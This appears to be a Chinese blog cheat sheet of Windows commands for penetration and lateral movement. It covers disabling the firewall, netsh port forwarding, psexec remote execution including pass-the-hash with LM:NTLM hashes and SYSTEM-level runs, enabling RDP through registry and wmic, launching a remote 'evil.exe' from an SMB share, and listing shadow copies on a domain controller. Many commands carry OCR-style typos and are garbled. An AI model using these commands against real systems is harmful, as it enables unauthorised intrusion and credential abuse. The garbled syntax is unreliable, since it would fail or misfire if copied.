windows环境渗透中常用系统命令

禁用windows防火墙
netsh advfirewall set currentprofile state off
netsh adbfirewall set all profiles state off

本机windows端口转发(必须是管理员权限)不需要借助第三方软件进行转发
启用转发
netsh interface port proxy add v4tov4 listenport=3000 listenaddress=192.168.1.100 connectport=4000 connectaddress=192.168.1.120
停止转发
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=192.168.1.100

psexec的一些用法

执行远程主机上上的文件或者命令
psexec /acceptula \targetip -u domain\user -p password -c -f \smbip \share\file.exe

#注意,第一次执行psexec一定要带aaceptula参数,否则会弹出一个确认对话框,在命令行下是没办法结束的

利用用户hash来登录远程主机并执行命令
psexec /acceptula \ip -u Domain\user -p LM:NTLM cmd.exe /c dir c:\

以system权限来执行远程命令
psexec /accepteula \ip -s md.exe

修改注册表开启windows终端服务
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

wmi命令用法详解

使用用户名密码通过smb来执行远程主机上的命令或者文件
wmic /node: targetiP /user:domain\user /password:password process call create "\ smbiP \share\evil.exe”

卸载软件
wmic product get name /value # 获取软件名称
wmic product where name=11XXX" call uninstall /nointeractive

判定远程登录用户
wmic /node:remotecomputer computersystern get username

实时获取远程主机进程
wmic /node:machinename process list brief /every:1

开启远程rdp
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
AllowTSConnections=''O'' call SetAllowTSConnections ''1’'

列举用户登录时长
wmic netlogin where (name like "%adm%") get numberoflogons

卷影拷贝服务
wmic /node: DC IP /user:"DOI1AIN\user" /password:"P ASS 11 process call create "cmd /c vssadmin list shadows 2 &1 c:\temp\output.txt”


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kaitoulee

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值